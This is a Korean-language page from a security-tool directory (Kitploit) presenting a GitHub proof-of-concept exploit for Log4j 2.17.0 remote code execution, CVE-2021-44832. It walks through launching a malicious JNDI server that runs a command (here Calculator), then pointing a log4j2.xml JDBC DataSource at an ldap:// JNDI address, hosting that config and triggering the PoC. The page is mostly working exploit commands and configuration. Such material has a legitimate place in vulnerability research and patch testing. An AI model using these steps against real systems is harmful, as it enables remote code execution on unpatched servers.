Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
log4j_RCE_CVE-2021-44832 — Log4j 2.17.0 원격 코드 실행 (CVE-2021-44832)에 대한 개념 증명 익스플로잇 - 악성 설정 파일 배포를 통한 JNDI 인젝션 사용 | Kitploit
도구/GitHubGitHub/cckuailong/log4j_rce_cve-2021-44832
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlRemote Access Tool
GitHubcckuailong/log4j_rce_cve-2021-44832

log4j_RCE_CVE-2021-44832

Log4j 2.17.0 원격 코드 실행 (CVE-2021-44832)에 대한 개념 증명 익스플로잇 - 악성 설정 파일 배포를 통한 JNDI 인젝션 사용

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
4114년 전아직 검토되지 않음

Log4j 2.17.0 RCE -- CVE-2021-44832

재현

  1. 악성 jndi 서버 시작
root@kitploit:~
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"

  1. config/log4j2.xml의 DataSource 부분을 생성된 jndi 주소로 수정
root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
    <Appenders>
        <JDBC name="databaseAppender" tableName="dbo.application_log">
            <DataSource jndiName="ldap://127.0.0.1:1389/nvrcl6" />
            <Column name="eventDate" isEventTimestamp="true" />
            <Column name="level" pattern="%level" />
            <Column name="logger" pattern="%logger" />
            <Column name="message" pattern="%message" />
            <Column name="exception" pattern="%ex{full}" />
        </JDBC>
    </Appenders>
    <Loggers>
        <Root level="warn">
            <AppenderRef ref="databaseAppender"/>
        </Root>
    </Loggers>
</Configuration>

설정 파일을 자신의 HTTP 서버에 배포

  1. Poc 수정

HTTP 서버에 배포된 설정 파일로 수정

  1. 실행

Log4shell 주제

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

reapoc에 기여하기

https://github.com/cckuailong/reapoc

도구 다운로드